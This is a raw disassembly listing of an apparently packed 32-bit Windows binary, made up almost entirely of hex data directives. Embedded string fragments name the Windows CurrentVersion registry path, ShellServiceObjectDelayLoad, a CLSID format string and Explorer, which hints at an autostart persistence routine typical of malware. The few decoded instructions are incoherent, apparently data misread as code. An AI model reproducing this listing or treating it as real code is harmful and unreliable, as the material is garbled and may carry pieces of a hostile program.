dd 64D8017Ch, 3F764D38h, 742E3790h, 2B747865h, 6FFB20A2h
dd 0EB96CBh, 2EE0041Ah, 6F6C6572h, 0ECA6CC63h, 0FB9E677Bh
dd 42A22623h, 3D951079h, 30340370h, 669B2CDBh, 2FFA1226h
dd 1B3046E2h, 3BAE9A69h, 32C0B42h, 0D36E5E14h, 4AB2CD34h
dd 7062562Ch, 34D34D86h, 0C2AE9C4Dh, 9AF2E2D4h, 83659AEh
dd 728182Dh, 9A69463Ch, 625469A6h, 0B28E786Ch, 9EA69A69h
dd 2E2C6B4h, 0B9D34D2Fh, 2E0AF4CDh, 3C240397h, 0D34D344Ch
dd 7C6A5C34h, 34DB9A8Ah, 0C0AAD34Dh, 2EF2E6CEh, 0A77659BFh
dd 1087243Bh, 0E42BF403h, 0A69A69A6h, 0B6C0CAD4h, 6D60BAACh
dd 9098A29Ah, 0B27FD72Bh, 0E9B67B66h, 2F8A9603h, 3307813h
dd 17FFFF88h, 813066D2h, 54464F53h, 45524157h, 63694D5Ch
dd 6F736F72h, 0FFFFE566h, 575C74FFh, 6F646E69h, 435C7377h
dd 65727275h, 6556746Eh, 6F697372h, 68535C6Eh, 0DB6FFB7Fh
dd 760C536Ch, 624F6528h, 7463656Ah, 79611044h, 64616F4Ch
dd 7015AD6Eh, 82B3947h, 3F4D6739h, 2006A5FFh, 7041DB6Ch
dd 6D747261h, 495C6E65h, 5EDFFA6Eh, 3B635303h, 323302h
dd 49534C43h, 0D9235C44h, 0BBE77Eh, 3830257Bh, 34042D58h
dd 61DBFA5Dh, 83237D03h, 9090FCECh, 5706F0E8h, 0AFBBDEF7h
dd 3759060Bh, 74697845h, 0DE827C73h, 4CFB6046h, 71726269h
dd 686B3B79h, 0D76C656Eh, 0DF67BF6Eh, 1B545FB5h, 0FD55779h
dd 0DBFB7DF6h, 7562B565h, 69725067h, 67656CC7h, 305C2365h
dd 1ED77850h, 0F2B642Eh, 4F4C5058h, 0B7376F11h, 727033D5h
dd 61C52172h, 73642B62h, 0DEC6F66h, 126F6236h, 0BB79732Eh
dd 0A0DD035Ch, 4964B835h, 3A5D5C21h, 0B7F6472h, 511A8FB1h
dd 1F335F74h, 4F5F5CECh, 0B2186570h, 566EFE57h, 61484478h
dd 6E706Eh, 37FFB5ACh, 542D2D4Dh, 51574B59h, 4A484647h
dd 61130E0Ah, 411FF9EDh, 41594245h, 464C4853h, 67025B25h
dd 20EF7B09h, 12050320h, 7BEE3023h, 0F32B0EFh, 15040B3Ah
dd 83601E33h, 57677FFCh, 4B574A45h, 45574A46h, 13BBAB41h
dd 444EFE9Ah, 44525349h, 0FF971A03h, 901FA200h, 0B6ECBCBh
dd 8D0F1FA6h, 0B9219121h, 2319A4BCh, 35253123h, 7FD36D25h
db 0D9h, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 57740150h
push 24h
dec ch
imul ch
adc eax, 8D1E112Ch
inc ebp
lock push eax
or [eax], ebp
movzx eax, word ptr [ebp-6]
push eax
mov esi, ds:74F3CF20h
iret
; ---------------------------------------------------------------------------
db 0Ah
dd 0FE0450FCh, 66F4F6F8h, 50F7FB9Bh, 5B78858Dh, 0C068F075h
dd 10D63826h, 0ECBB36CDh, 68FEB017h, 0C4F14B4h, 7F1DB76Ah
dd 599904FBh, 0DC5FF9F7h, 5205C283h, 0D60C2A50h, 0CC10345Dh
dd 832F73BDh, 271538C4h, 29B06850h, 76DB3B81h, 0BF8F5B77h
dd 575080A0h, 220F1228h, 736E5214h, 15A40647h, 8763730h
dd 0E6B07D33h, 310B1766h, 68096A2Ch, 0E761D898h, 8830C9ECh
dd 0DB9F2845h, 372F66FDh, 40687909h, 6E026823h, 986E7786h
dd 5F12606Ch, 22C3C95Eh, 1BEF0AEFh, 8B5318E1h, 6726A91Dh
dd 7D89FF33h, 0FF0AEFFCh, 83D3FFFCh, 895010C0h, 0DC1C312Ch
dd 3B59F08Bh, 23840FF7h, 37BAEFDBh, 680A6A49h, 17563AE4h
dd 56A021Dh, 0F00F468Dh, 7B16DFB7h, 18590F81h, 7640D3B4h
dd 0ED6C0F46h, 1509730Fh, 2068570Ch, 14752412h, 0DED93FFBh
dd 0E75C73Bh, 6A041809h, 8D23EB02h, 0F351F84Dh, 0B3DB1337h
dd 2BF8111Ch, 50215E2Ah, 6EEDC210h, 0FA08823Bh, 13E95803h
dd 0FB62840Ah, 68F7DD77h, 57833000h, 8B1F4C2Eh, 74DF3BD8h
dd 5C14687Dh, 1BB73AD9h, 4681048h, 0EF4B70Ah, 0BB6F6044h
dd 8BF66ABFh, 0F86858F8h, 5AC32B58h, 16F803F4h, 0F4BFC28Dh
dd 0C87E89F1h, 0C103CB2Bh, 210B4689h, 0B86E7E22h, 5356E10Dh
dd 104023B0h, 0EEF633E8h, 0C2DFEC6Fh, 50560F43h, 16565653h
dd 74C68C3Ch, 17EE7709h, 0EB389B8Dh, 431C710h, 350807EBh
dd 699ECDFh, 7111A25h, 611B7D8Bh, 5B6006A1h, 57465161h
dd 8E310F60h, 96BB66DFh, 542461FCh, 0A31CAF0Fh, 0FFDE0EB4h
dd 0A12175FFh, 7621B907h, 0C0693524h, 7F7C7BFBh, 6851C82Bh
dd 98EDC212h, 1D582BD9h, 74BFD0F7h, 0F6FB2D24h, 0C701C7DCh
dd 0A756155Ch, 0C033500Ch, 0DD3306BCh, 9A6B0CA1h, 6C5DA160h
dd 0D9131A3Bh, 206AD956h, 0B438641Ah, 0DE089D8Dh, 16ECA2F0h
dd 0D866B738h, 522E3019h, 6B02F8C3h, 0C7DBDA1Bh, 13010E10h
dd 0D537106Ah, 0AD99E9B3h, 0C61014FCh, 0A702284Bh, 780DCD73h
dd 4104FDD8h, 9D237C51h, 15117A79h, 0E07813E0h, 1F9259B5h
dd 111244CFh, 72E9DB54h, 8B740ED3h, 2F7483F0h, 0D9E80390h
dd 78325B64h, 1270A056h, 21199D35h, 681B6C57h, 0EF8D1F5Eh
dd 537D8986h, 5357DB33h, 0EE906440h, 0E70B6FBDh, 6C745B83h
dd 0A218BE56h, 6667BF6Ah, 87F538Ch, 15B5890Fh, 0D3EC5750h
dd 858A3FD2h, 9F3674C0h, 39D66784h, 6CE6E199h, 26137476h
dd 0EB158420h, 9BE171E3h, 0FC145B35h, 57D9895Bh, 0B067FC61h
dd 0C38B5E3Fh, 48D5B5Fh, 56085D8Bh, 0B7FE5357h, 590EFDBEh
dd 0C88B3D66h, 0D1443F76h, 5C1A3C80h, 0C1810D74h, 0AF6FFF6Dh
dd 77C9151Fh, 4101EBECh, 73C83B66h, 0FFC91B23h, 2B4BE17h
dd 0F12B6DF0h, 8DC51778h, 8A470814h, 94881A14h, 63766105h
dd 0C7186D7Bh, 7AEB7E6Dh, 18B7C62Fh, 644C90A6h, 560C245Ch
dd 0DDB7AF9Dh, 7C8B57FFh, 0DB851024h, 0A6E197Eh, 6AC02EABh
dd 0E6787D1Ah, 0C280FFFEh, 3E148861h, 7CF33B46h, 1F2480E7h
dd 109F3200h, 0F8EC2C02h, 8B0C8FFFh, 5648084Dh, 50BC0D89h
dd 0F0C67775h, 930B237Bh, 0F898A151h, 4F84536Fh, 0DA0BB0B6h
dd 0C711FC1Bh, 0C75C2404h, 76F67B01h, 59D759D6h, 68152E75h
dd 0CBF01354h, 4E1AB37Eh, 0B27093Bh, 0CEB0408h, 0BDAFE161h
dd 193C68F1h, 59E0A929h, 0C3585059h, 702795F7h, 189B0CC2h
dd 72891703h, 0FB3DB363h, 12946801h, 8F59D126h, 95B73DA8h
dd 934F85BDh, 940E01FEh, 0C9ADBF5Dh, 5D9C64C9h, 0F8F07B57h
dd 6D937C9Dh, 80A530BBh, 0B1E19F68h, 59CDB44Eh, 3F00C0A3h
dd 5F7BACA4h, 3C7C315Fh, 70241235h, 0B36E960Ch, 0BFA04505h
dd 6657E564h, 55A05A78h, 26136DB7h, 0B93D9B9Ch, 0EBEB05FDh
dd 0CFCE8E6h, 580A3468h, 77166CC7h, 756A7B16h, 0E15D2733h
dd 0F7E35F17h, 0D8CDE804h, 8B76E69Fh, 0FC18A2F1h, 5006C79Ch
dd 8C654113h, 1A1DE399h, 14C0196Ah, 8D66B605h, 0B7102610h
dd 6E741F20h, 126D5781h, 0B0C30257h, 1EB56F09h, 18C8D761h
dd 59350B75h, 89FF2DC0h, 1CEB147Eh, 9575757h, 99BEAC47h
dd 14463EB7h, 20469974h, 8B1C1601h, 7F685FC6h, 568DC6D7h
dd 420F6283h, 82444F6h, 66D82001h, 20D611DBh, 1B5E1D59h
dd 0BB6F3DA2h, 8BEAFB59h, 74689D5Ch, 8BD77403h, 95A3DB76h
dd 0F68514EDh, 61465609h, 0FB7F752Ah, 0DF1CB7F6h, 375F03Bh
dd 515B718Dh, 27FA8318h, 20453925h, 35B20675h, 0C183FDB0h
dd 3EB5104h, 184720D0h, 0B3F51402h, 0AF10D674h, 5DB44552h
dd 5EB61CC2h, 0B870D805h, 0E41A7AC4h, 42BEE510h, 681804FFh
dd 9A7A20C4h, 0C847896Ah, 0E4CED8h, 0CC18086Ah, 2BD8D8C8h
dd 1016C420h, 11D94C35h, 18D4D032h, 1A05B08Dh, 69140B2Ch
dd 1D19D81Bh, 45148E7Ch, 530800A0h, 170A565Eh, 605E12CCh
dd 0B8FC4D61h, 0C604660Bh, 0C040940Ah, 0C0B383ABh, 70BDDDEDh
dd 5750211h, 3CEBEA8Bh, 0CD0612CBh, 0AFBCC187h, 53A46810h
dd 76FC1A8Ah, 0EB760362h, 0C7D3931h, 5D2BA5Dh, 17D0191Eh
dd 1EE002EBh, 0DD6B5BB8h, 575F30F6h, 0AE718D00h, 0C57EDC91h
dd 2189344Ah, 8C20E94h, 0F1386DAEh, 880BF98h, 98E7857h
dd 8BEF12DBh, 0C331085Eh, 0FDF402F0h, 205C74C3h, 2C147449h
dd 9BA1C7C8h, 660DA265h, 0DD4A7AC4h, 46E25C68h, 0EFE84D6Dh
dd 0BA4F510Ch, 0F13563FFh, 0D8F7FC26h, 2456C01Bh, 71E405FCh
dd 0D4839B50h, 18A86FC5h, 0C503E595h, 91B7B36Ah, 0C445FFB1h
dd 940F753Bh, 8FB693C0h, 0F9D91F06h, 0CC264A3Eh, 0DE35B18Bh
dd 59104D17h, 91060689h, 0F977CFA6h, 883B986h, 0E048A04h
dd 0C460101h, 78FB5D27h, 18E7106Dh, 44C77AD5h, 8D9D5342h
dd 0D9437639h, 5945F66Ah, 62065746h, 0CB3EB243h, 0F6AA3D06h
dd 0B46C2B6Dh, 0CC9B54Ch, 5F018963h, 62144B56h, 4C5B5DDCh
dd 0A420418Bh, 0DED6B455h, 56E1314Ch, 0A4CF3F68h, 16475D00h
dd 14158866h, 0EB670574h, 8CDC336Ch, 0A9AAA627h, 6332001Dh
dd 68039C1Bh, 0B8040F5Eh, 20612F6Dh, 0B60F6660h, 8AFB0573h
dd 785EBB64h, 0C10B9897h, 58681261h, 28D05213h, 2E21FBC2h
dd 6408A164h, 0A3072589h, 0DDC6C7CEh, 6589D22Ch, 0C29A5E8h
dd 57F42724h, 0BBB07BD7h, 50C3030Bh, 0CC0AF868h, 0E4B40B76h
dd 0F404014h, 0D170E12Eh, 61E0B916h, 2B34AF38h, 0F192A952h
dd 90B36BFBh, 1AFA9B69h, 0D9B94DCh, 0A1538593h, 94934390h
dd 0B6EB5B4Fh, 2FE416F8h, 0DB084239h, 0C0BF45F7h, 3BC8DA2Dh
dd 7C807C5Bh, 573201Eh, 5A6D44C6h, 2E066FE2h, 0FFE9EB40h
dd 75461F76h, 1BC3E075h, 81AE086Eh, 6480E003h, 0BAB1B961h
dd 50CC3105h, 0A60C04D4h, 0A246A6DDh, 1E081D5Fh, 0D80450DAh
dd 3CF3CF3Ch, 0CECCD4D6h, 79E79ED2h, 0B60A46D9h, 5060746h
dd 0EF9E6A04h, 30818F9h, 6010204h, 602353B6h, 92156A71h
dd 3405885h, 5790E813h, 3EC498C9h, 8598BF72h, 2350C49Ah
dd 683F50AEh, 0ADC6B6Fh, 420821D0h, 37865950h, 0D911623Eh
dd 0EBFFC483h, 1696D20Eh, 8BC3C2BEh, 598B0C75h, 0D907F185h
dd 0BEFA37D3h, 7D83CF1Ch, 0E07000E0h, 1A46160Eh, 72CC9684h
dd 0F20DB4F0h, 0CE718A70h, 0F468D8FBh, 3811C9F0h, 0ABFFC883h
dd 7C2CCDF6h, 55C09FA1h, 92D63B0Ch, 9EA50D79h, 77FCB42Eh
dd 86E41DE6h, 0FFFF7AF2h, 135EBB4Bh, 0DCA6CE8Bh, 2973CA3Bh
dd 8839048Ah, 303CC045h
dd 393C0972h, 8F4D1D73h, 0C0F87D77h, 4B0A0D6Ah, 797F74B8h
dd 0D8F18BE4h, 0EB4106EBh, 0F390FD0h, 0EDBC2885h, 4A8DBD1Fh
dd 48F13BF6h, 0FD735C15h, 88D1DFFFh, 144E8D00h, 2A7DC13Bh
dd 2673C23Bh, 88380C8Ah, 0F980BC4Dh, 0B6B19A2Dh, 54040A53h
dd 0DB77C959h, 75DB37DBh, 4092530h, 0D46583h, 0D44D3910h
dd 0D966AFA0h, 8DBF76DEh, 75C23B56h, 0B8388A1Fh, 9A78D8E8h
dd 1905080Ch, 36C143A4h, 0F8D6D8CCh, 802ED4ADh, 0D0F65181h
dd 2113C62h, 0CD08D0Bh, 0FD87777h, 3E048D02h, 0E021B50h
dd 0F023E44h, 498C639Eh, 80D346D0h, 0AD85C11h, 0B1208D0h
dd 4C883C4h, 4AEE37B7h, 7F3205C2h, 7C01C40Ah, 7E0C0405h
dd 6237895Dh, 43EA1A0h, 5066E31h, 0E6EC5AD4h, 6077530h
dd 2C187431h, 1B0B3003h, 0D70997ADh, 10D86846h, 18BB6D4Ah
dd 0E00A9214h, 0B84EA76h, 0C58830A1h, 9098C3C3h, 5878E423h
dd 19679CDBh, 0D35DC569h, 0FDB05DB3h, 9EBF3C80h, 48B662Eh
dd 0F2A02F4Fh, 35B97E10h, 97F0D7Ch, 0C475E33Ah, 0C972C33Bh
dd 5BCB5321h, 35BB6150h, 572A2E53h, 9C62470Ch, 0BF087EC5h
dd 590E7CB2h, 3BC975EBh, 0D33275CBh, 974C2CB0h, 0EFC65D5Dh
dd 0BF74B34Dh, 9124753Dh, 0C109847h, 3043B164h, 33949DCBh
dd 0C3E9C26Fh, 5306CBBBh, 900BBE4Ch, 0CC841966h, 0C47704CAh
dd 65C25FF2h, 0DA047704h, 5330C483h, 4C0A6A53h, 0ACD6DF07h
dd 5325FF0Ch, 497A20ABh, 0B815CE46h, 0D9AF27CCh, 0E4AAD91Bh
dd 0D90C1EA8h, 8D919037h, 0A8A800A4h, 0A36FF3A3h, 7C8366F1h
dd 7100085h, 875300Ah, 0EC3C304Bh, 75BE310Ch, 47FF9E0Fh
dd 16C811C8h, 0AE608852h, 0FA260394h, 4B466EB7h, 0ECEB5CFDh
dd 3DC86212h, 7D6857C3h, 7E80C58Bh, 423A0617h, 866DCE6Dh
dd 1CA5196Dh, 1E05F51Ah, 0D26329C1h, 0C22936Ch, 0ABE824D0h
dd 5EFE0D6Fh, 3F32B36h, 0D1B89B30h, 0C11656EEh, 16F06DAFh
dd 0DFFC60Eh, 0B54A140Ah, 2A2AB472h, 37096F20h, 22A850B3h
dd 0BF09037h, 0BF6E1174h, 0F3928D1h, 0D1C22B99h, 27E0EF8h
dd 0EB6356B1h, 0D33F923h, 7615AB2Ch, 0F6FD1CBh, 818DF9D1h
dd 7E275F70h, 7FB76605h, 0EBACE9A1h, 79FEAC16h, 0B87D3B02h
dd 0B8F84173h, 42F62D2Bh, 0AD90EC13h, 67501F04h, 0C4B62D72h
dd 15F703DBh, 0D8E8D190h, 0DB1955C7h, 43A3F336h, 0B0E1655h
dd 647D6F47h, 7FFF1EDFh, 7CF73BF0h, 17E8D06h, 814FBAEBh
dd 0A6E2A4C7h, 473FE3Bh, 0D5B6FC1Eh, 4EACF78Bh, 2B00FC5Fh
dd 7622AC75h, 0A30C90A1h, 7890024h, 5CD9A604h, 4789A4FBh
dd 7F9F504h, 12B4C808h, 0A9CB5285h, 21C098A7h, 322B1A37h
dd 0B1101047h, 8E95BA10h, 0A1A5C744h, 0AA32D527h, 401D4582h
dd 9436186Eh, 97573C60h, 2BB54868h, 0A05B7619h, 980E15B8h
dd 8E0C9E9Ch, 9193E951h, 0CE35C73Eh, 2A2EE05Dh, 0B741E14h
dd 6A6E4611h, 850B5BF8h, 8B5A9A04h, 2084B88Ch, 77B9CA53h
dd 0D7715B1Fh, 5589DC24h, 3C8D1AE8h, 7E1704BDh, 43C969ADh
dd 8DA0072Bh, 1B10A402h, 8501D49Fh, 300F560h, 8605FEBBh
dd 6857E035h, 1345F9B8h, 0CC308573h, 4816B80Eh, 0DB59893Eh
dd 3913EC18h, 0AFA26285h, 1A3A441h, 6BE0ACEAh, 6F7F7269h
dd 734FF64h, 40BB4E5Dh, 82A012C5h, 4A95CD9Bh, 10689731h
dd 84EC5027h, 98C439CEh, 11830CDEh, 8BA5EE72h, 12FE7A3Dh
dd 0A8DBA0B9h, 7CC052C5h, 7B1BAC01h, 7517DBFBh, 0EBE51839h
dd 8DE00B37h, 6C51D01Ch, 19B0F65Ch, 1BE1103h, 0FD7B0F20h
dd 282BB1DBh, 0BD6F1B06h, 0CC38151Ah, 0A3C4B5FFh, 4DCD99F9h
dd 1863CCD0h, 0DDBB8C0Eh, 711E0B0Dh, 30CB84EBh, 0D868D31Bh
dd 0B9EC9D90h, 996975B8h, 10984B4Fh, 53061326h, 244F8053h
dd 0EB4E404Ch, 0B7646A91h, 5F471304h, 439C87EBh, 6C2008C6h
dd 0E88C0DB8h, 63C7ABBAh, 5D346A42h, 0C11D72Fh, 0F460C6C7h
dd 7DAF6359h, 460B2C8h, 23F0B850h, 11EC0912h, 61548C19h
dd 0C80BEEC8h, 51C78359h, 7CC84D83h, 0EBF160C0h, 1C285778h
dd 8EC6045Fh, 1B6B5AF0h, 0E8BAC0Bh, 0DAB74C33h, 76D09899h
dd 0C8B52139h, 0B83351A6h, 3E8924CFh, 0FCBBA289h, 0B8844420h
dd 6425527Dh, 97D684AFh, 0C683477Eh, 72F0C208h, 0A75ECFh
dd 0D81DCC04h, 0C4C75F78h, 5328D574h, 0CBFAE07h, 474CD135h
dd 9F11280Fh, 67E8666Ah, 2C11138Bh, 480825FFh, 0C8E79105h
dd 0F80004C8h, 0C16CF410h, 0ECF0919Ah, 0E81900CCh, 8C8CEC27h
dd 5100DCE0h, 1BF6F33Dh, 0F58D767Dh, 81147208h, 662D87E9h
dd 7F6F162Dh, 170185ECh, 0C82BEC73h, 8B0CC48Bh, 0C8F18BE1h
dd 40C1B748h, 804FC331h, 869F8C88h, 0E9998CC8h, 602960B8h
dd 77C9C96Fh, 0C8133A1Dh, 284A0088h, 520F4F7h, 80E11993h
dd 0CC397E16h, 34F7D03Dh, 85A8271Bh, 48206F50h, 972EDF1Bh
dd 132B0D97h, 10DC2C32h, 35802A74h, 2F7C4BCBh, 3A276C1Ch
dd 0D6E5CB20h, 5811142Fh, 5CDA3058h, 805FAC76h, 2898132Bh
dd 2089E811h, 2A6578Ch, 0BFE59F72h, 9709E6B5h, 6D656D02h
dd 99797063h, 0B3B96573h, 0BE7497FCh, 72747302h, 0C56E656Ch
dd 0DD3BC302h, 63096BCFh, 31BA1D61h, 0B76CD3A6h, 333F3F7Fh
dd 58415940h, 5A400250h, 0FD320F0Fh, 0E3AF837h, 0AACA0F49h
dd 65637865h, 685F7470h, 43D16EDDh, 3DC17252h, 696F4302h
dd 0B2FDADB3h, 435F491Bh, 85467878h, 781D4875h, 0AF0ADEA3h
dd 5F484513h, 676F6C82h, 0B41BD42h, 5243D031h, 7D9C7B54h
dd 49573DB6h, 0C45014Eh, 8A6C038Fh, 0DEE0B641h, 0AA0B7933h
dd 3743240Bh, 0B54276A8h, 0D60BDBFh, 0DEDB5460h, 52657474h
dd 81056FD3h, 0FDB6B7BAh, 7257037Fh, 62500E69h, 4D737396h
dd 0FB9B721Bh, 89C7EED7h, 13F64701h, 72646441h, 2E671117h
dd 213AA5D8h, 5F4F6C75h, 0FFDAD809h, 69560356h, 61757472h
dd 2A84416Ch, 0C10A8445h, 261751Ch, 0B5354C31h, 33FFEA9Bh
dd 6B636954h, 4E756F43h, 6490207h, 0AEED86B6h, 656B2BD5h
dd 3632E64h, 0EB579767h, 4D41C04Ah, 65555075h, 4DEA930Fh
dd 452FA136h, 0FDFEDAD1h, 3885961h, 0DB636C5Fh, 5302F500h
dd 0BC80461Dh, 6710A56Dh, 14F0D6Dh, 70E09E47h, 6F258BDDh
dd 70210B8Fh, 0F6B6D579h, 5323A66Bh, 44EB0F79h, 0E6EC1EBEh
dd 16F10C5Ah, 335B0273h, 2BB64E32h, 30D7026Bh, 718C4975h
dd 0CB68E6C8h, 0AD066525h, 0AA96DF68h, 0B0A36F70h, 6E531870h
dd 6B617061h, 6F2846DDh, 7F43D51Bh, 784B1E62h, 414482DBh
dd 45DB6D65h, 7C33BB46h, 15EA4EA5h, 0B530329h, 16D83714h
dd 2FDA00ECh, 0D2306E1Ah, 0CD86F92Fh, 0C3ACD5AAh, 0DAD6C85Ah
dd 45614CF2h, 468511A0h, 3B9D66F7h, 1FAE7645h, 60640F4Ah
dd 7AAEC2B4h, 6544007Fh, 886F49FBh, 0D6D5671Eh, 0E5004C76h
dd 79651F31h, 61378000h, 87022ED5h, 8D965DC8h, 453C1386h
dd 61236592h, 1600446h, 255368D8h, 0CF75426Ch, 0A900F8D4h
dd 721C4902h, 735B2DEBh, 7043AD6Ch, 694C430Ah, 0C9BD53C2h
dd 3D217386h, 0C288765Fh, 0D5284B08h, 0BBF19F79h, 1C68F436h
dd 7D18FF50h, 2EDB4500h, 4508F653h, 5C646969h, 0B76A9F68h
dd 2767428Dh, 7942146Ch, 0CE6ECA26h, 284F55D1h, 787A6927h
dd 63090330h, 0F459B55h, 0DFE96AB0h, 454B00F8h, 0C74C3C52h
dd 70A95D0Bh, 635D02D8h, 7B716682h, 258CC218h, 71D6FC80h
dd 1789E9C3h, 72676506h
dd 0ED2564D0h, 7C3B36h, 0CAF00E3h, 5A53553Fh, 61E176B6h
dd 0F9001C57h, 0B3EE756Ah, 9DB06Bh, 73B7149Ch, 36C3017Dh
dd 126FADC9h, 96567075h, 621EA775h, 1A86901h, 528B343Dh
dd 0D48E16F0h, 654BC620h, 440DF8A9h, 34CC4336h, 0CC1F9A30h
dd 3BDFD6D8h, 411220ECh, 496F5644h, 79424B83h, 6F432561h
dd 6C112755h, 0F666785h, 54754730h, 6B0D390Fh, 1F49D603h
dd 0AE3C916Fh, 845160h, 0DFD6FFCEh, 5C333F50h, 6C336033h
dd 337C3A33h, 338C3380h, 6FFFF90h, 33AF33FFh, 33C433B9h
dd 9341BEBh, 31342234h, 5A345334h, 84347934h, 0FFFFFF34h
dd 0BB34A8FFh, 0F634CC34h, 2B350634h, 3B353135h, 5D354E35h
dd 88357D35h, 93358E35h, 0A7359D35h, 0FFFFFF35h, 0D335B4FFh
dd 0F535EA35h, 35361035h, 48364036h, 61365B36h, 77366636h
dd 97369036h, 0B236AB36h, 0FFFFFF36h, 0D136C2FFh, 436E636h
dd 23371837h, 39372A37h, 68375337h, 0C2376F37h, 0F937F237h
dd 0B7386937h, 0FFFF5638h, 0DE38CCFFh, 0FF38EB38h, 50392938h
dd 80395C39h, 9A399439h, 0B839A539h, 0FFFFA539h, 39C5FFFFh
dd 39D239CBh, 39E039D8h, 39F839E5h, 3A483A0Dh, 3A843A4Fh
dd 3AA53A92h, 3AED3AE4h, 6FFFFF3Fh, 3C123BF1h, 383C0E27h
dd 5E3C3F3Ch, 0B13CA33Ch, 0F23CBE3Ch, 0C73D043Ch, 0FFFFFF3Dh
dd 0F53DE5FFh, 183E133Dh, 3A3E343Eh, 7F3E793Eh, 0E93E983Eh
dd 573F503Eh, 6B3F643Fh, 863F7B3Fh, 0C34A3F3Fh, 0CB3F98FFh
dd 0EC3FD13Fh, 0F3FF13Fh, 302A7320h, 0FFFFFFFEh, 31B531B0h
dd 3320330Ah, 3337332Ah, 33B533B0h, 35663553h, 362C3615h
dd 364A3633h, 0FFDC3657h, 0C3EFFFFFh, 375836ECh, 37C837B4h
dd 37FA37F4h, 38403836h, 38593847h, 38993887h, 38A638A0h
dd 0FFFBBFFFh, 38B238ACh, 38BE38B8h, 38D238C4h, 3922D1D8h
dd 392E3928h, 3951393Dh, 39843968h, 0E3584004h, 0F0AC3990h
dd 12819200h, 0F7D0FF8Ah, 75ABFF65h, 3149D00Fh, 31ABE6Eh
dd 7151ABFh, 7CDF37DDh, 1AAD4D68h, 0B44D3736h, 68F63F1Ah
dd 27301AB8h, 14644F52h, 686369E7h, 0F7000507h, 0E4B9B535h
dd 140727Ch, 79F3140h, 9ABE02EBh, 31A09713h, 0C80B0D2Ch
dd 0F601E9D8h, 19270403h, 0A0F27BC5h, 25FECA3Bh, 8A31DB07h
dd 3A307C53h, 689F3460h, 92BDCEC2h, 2338E004h, 0A703304Fh
dd 0C840BC28h, 76A9831Ch, 7A32A76h, 602B2954h, 8C2DA207h
dd 3B920762h, 525E642Bh, 0E7617461h, 530780FBh, 7314643h
dd 65B2D8C8h, 0AF5458DDh, 72C2307h, 0A8DB34Fh, 9F2EE21Dh
dd 23EB00D1h, 0F37D98A3h, 3B570780h, 7F1460E1h, 0C00302B2h
dd 4651ED07h, 32E27F31h, 36CEEB03h, 18330ACBh, 0C01332F6h
dd 0A603AA0Bh, 94A69A69h, 384A60DEh, 9AEBB2C8h, 267F10FAh
dd 44337A8Bh, 375D34D3h, 3B23BC6h, 656A7E96h, 5E4D34D3h
dd 0FE162E3Eh, 69A69A31h, 0B8D0E69Ah, 0E3748CA6h, 5C6D9630h
dd 25B9331h, 414DF27h, 51264AA4h, 0FFC98353h, 54BF722Eh
dd 5051C1F9h, 5F2020BBh, 821FEAB7h, 2856C5FCh, 0C5FC7D8Bh
dd 97D488B9h, 332E7782h, 5DABF3C0h, 328358Bh, 6E89B73Dh
dd 45E488A0h, 1405E888h, 0EE936C8Ch, 1DE40E08h, 21C8D8D4h
dd 0D4D88723h, 763278DCh, 0EE0E0C8h, 0E4EC05DCh, 0E123EF92h
dd 0F4FC0AD6h, 9EC1B9FFh, 133CC083h, 4EA6AC04h, 39F633FCh
dd 0F772B782h, 4875F875h, 5FC6814h, 646A3822h, 3DF7CCD6h
dd 1B22C4C8h, 0EF181322h, 34D9333Bh, 74141C16h, 3870FF14h
dd 0BAFB500Fh, 0FC8B1682h, 14EA1009h, 0BE7C00A2h, 0F8D8E0CCh
dd 192EE14Bh, 5F7DCC86h, 8EB70F10h, 763F01CAh, 2A2170ACh
dd 0F1BE8D28h, 74C73B07h, 0EEF6C812h, 4508BFFh, 8950088Bh
dd 451890Ah, 0EB5E441Bh, 0B7D41DE8h, 3F723D8Fh, 1FC4588Dh
dd 2C603D83h, 41750419h, 0CF15B6Fh, 0BA3C4E8Dh, 46880B02h
dd 0FD8CD40h, 0D24CA1DBh, 568AC91Ah, 0EBA01D40h, 0B64023D9h
dd 0FFDC4ABBh, 10E1EE76h, 3407B67Eh, 47868D2Eh, 0B10C354Fh
dd 114528Fh, 0FF03DC56h, 87A9141Ah, 8B2ED10Eh, 1FFF85F8h
dd 73F355B4h, 678308A9h, 47C70018h, 0DE1011Ch, 6007375h
dd 460D0624h, 0B28E8D0Eh, 0FBC74F8Fh, 8A204789h, 86889E25h
dd 0F6B7F776h, 438B1A67h, 1F1F8904h, 7B893804h, 18968A04h
dd 0B367DB36h, 7505AC97h, 40D015h, 5EEC8E76h, 0FF4D4758h
dd 0EB0BC4B6h, 36587607h, 0A5361B1Ch, 3D078550h, 2F34E180h
dd 51CD9B3Ch, 4F8B6369h, 1890719h, 0DEC966C6h, 735A4889h
dd 645EC260h, 0C7C06E7Bh, 0B6C4B2ABh, 3399B008h, 0BD02CDDDh
dd 9D835AD0h, 8BB8B657h, 0B84DF21Dh, 80112B0Ah, 6FB2AC3h
dd 0C01B2B59h, 0BB9D31Eh, 8D30D0DFh, 83CC8E5Dh, 0D308247Ch
dd 2DFEE10Fh, 470C9901h, 8A3008Bh, 0C058A06Bh, 0C9C2B1B6h
dd 0DD796CCh, 9A4B6017h, 79BBBFB8h, 7FE00EDBh, 80605E8Bh
dd 44750E3Bh, 8BF84B8Bh, 6D4DC253h, 0F0B7F017h, 0FF330C0Bh
dd 0D9E0F981h, 0C410F445h, 0F8ED9BD2h, 0E40D4174h, 5D8D3974h
dd 75FB52FBh, 509A4DBBh, 3E507751h, 0BF510964h, 97E04B0Dh
dd 322FD2EAh, 187E89D2h, 301C4689h, 0C225768Bh, 44C78BC4h
dd 16F0D9F0h, 30FF51CDh, 74544C60h, 2D23EDCAh, 85F06B9Fh
dd 0CDB58F6h, 0DB6446C6h, 0DDFBBF63h, 3B896846h, 850F044Bh
dd 0F983153Ch, 33820F0Dh, 0DB37F41Eh, 55D81A37h, 0CA3B0CC2h
dd 7D812210h, 0C1EA16F8h, 9759F7Fh, 0C61846C7h, 23F66673h
dd 8BE3D85Ch, 719F8D1Ah, 488D1C4Eh, 0E106050Ch, 8B20F6DBh
dd 55CBD740h, 0EC5D8924h, 0B16F874Ah, 928F46BFh, 2BE4878Dh
dd 318906F4h, 0C2C8C678h, 97567089h, 5D8B13CBh, 585B4200h
dd 481D430Fh, 0CD2CBAC6h, 0B746CD20h, 68577746h, 10F9D52Bh
dd 0C1DBF7B9h, 170B6185h, 1DF43135h, 0B2AAC0Ch, 0B5748A0Dh
dd 286E3BE4h, 0DB80B5A1h, 459C4189h, 444449F0h, 0E0866170h
